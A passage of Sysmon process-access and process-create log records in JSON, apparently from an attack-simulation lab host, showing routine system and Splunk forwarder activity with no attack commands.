C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:20.677","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:21","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:20","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2236,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:20.677\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:20.677","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:21","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:20","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2237,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:20.677\r\nSourceProcessGUID: {E2A3D6B1-106C-5F25-0000-0010ED600300}\r\nSourceProcessId: 3816\r\nSourceThreadId: 3836\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {E2A3D6B1-1070-5F25-0000-0010F90C0400}\r\nTargetProcessId: 3912\r\nTargetImage: C:\\Windows\\system32\\cmd.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:20.677","SourceProcessGUID":"{E2A3D6B1-106C-5F25-0000-0010ED600300}","SourceProcessId":"3816","SourceThreadId":"3836","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{E2A3D6B1-1070-5F25-0000-0010F90C0400}","TargetProcessId":"3912","TargetImage":"C:\\Windows\\system32\\cmd.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:21","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:20","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2238,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:20.708\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3596\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:20.708","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3596","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 06:49:21","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:20","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":2239,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:20.788\r\nProcessGuid: {E2A3D6B1-1070-5F25-0000-0010DC0E0400}\r\nProcessId: 4084\r\nImage: C:\\Windows\\System32\\cmd.exe\r\nFileVersion: 10.0.14393.0 (rs1_release.160715-1616)\r\nDescription: Windows Command Processor\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: Cmd.Exe\r\nCommandLine: C:\\Windows\\system32\\cmd.exe /c \"\"C:\\Program Files\\SplunkUniversalForwarder\\etc\\system\\bin\\powershell2.cmd\" --scheme\"\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: NT AUTHORITY\\SYSTEM\r\nLogonGuid: {E2A3D6B1-1058-5F25-0000-0020E7030000}\r\nLogonId: 0x3E7\r\nTerminalSessionId: 0\r\nIntegrityLevel: System\r\nHashes: MD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A\r\nParentProcessGuid: {E2A3D6B1-106B-5F25-0000-0010C1C00200}\r\nParentProcessId: 2792\r\nParentImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nParentCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 06:49:20.788","ProcessGuid":"{E2A3D6B1-1070-5F25-0000-0010DC0E0400}","Image":"C:\\Windows\\System32\\cmd.exe","FileVersion":"10.0.14393.0 (rs1_release.160715-1616)","Description":"Windows Command Processor","Product":"Microsoft® Windows® Operating System","Company":"Microsoft Corporation","OriginalFileName":"Cmd.Exe","CommandLine":"C:\\Windows\\system32\\cmd.exe /c \"\"C:\\Program Files\\SplunkUniversalForwarder\\etc\\system\\bin\\powershell2.cmd\" --scheme\"","CurrentDirectory":"C:\\Windows\\system32\\","User":"NT AUTHORITY\\SYSTEM","LogonGuid":"{E2A3D6B1-1058-5F25-0000-0020E7030000}","LogonId":"0x3e7","TerminalSessionId":"0","IntegrityLevel":"System","Hashes":"MD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A","ParentProcessGuid":"{E2A3D6B1-106B-5F25-0000-0010C1C00200}","ParentProcessId":"2792","ParentImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","ParentCommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","EventReceivedTime":"2020-08-01 06:49:21","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:20","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2240,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:20.786\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-0010C1C00200}\r\nSourceProcessId: 2792\r\nSourceThreadId: 3812\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nTargetProcessGUID: {E2A3D6B1-106F-5F25-0000-00106CF10300}\r\nTargetProcessId: 4084\r\nTargetImage: C:\\Windows\\system32\\cmd.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ce6a3b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+7d35e7|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+7cdcb9|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+7ca4ec|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+7ca0a3|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+7c9f0d|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+6d7908|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+6de2ee|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+6b29fa|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+6b4274|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+e42dc|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ec682|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+e9959|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+d7f31|C:\\Windows\\System32\\sechost.dll+14342|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:20.786","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-0010C1C00200}","SourceProcessId":"2792","SourceThreadId":"3812","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","TargetProcessGUID":"{E2A3D6B1-106F-5F25-0000-00106CF10300}","TargetProcessId":"4084","TargetImage":"C:\\Windows\\system32\\cmd.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ce6a3b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+7d35e7|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+7cdcb9|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+7ca4ec|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+7ca0a3|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+7c9f0d|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+6d7908|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+6de2ee|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+6b29fa|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+6b4274|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+e42dc|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ec682|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+e9959|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+d7f31|C:\\Windows\\System32\\sechost.dll+14342|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:21","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:20","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2241,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:20.786\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 1212\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-106F-5F25-0000-00106CF10300}\r\nTargetProcessId: 4084\r\nTargetImage: C:\\Windows\\system32\\cmd.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:20.786","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"1212","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-106F-5F25-0000-00106CF10300}","TargetProcessId":"4084","TargetImage":"C:\\Windows\\system32\\cmd.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 06:49:21","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:20","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2242,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:20.786\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:20.786","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:21","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:20","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2243,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:20.786\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 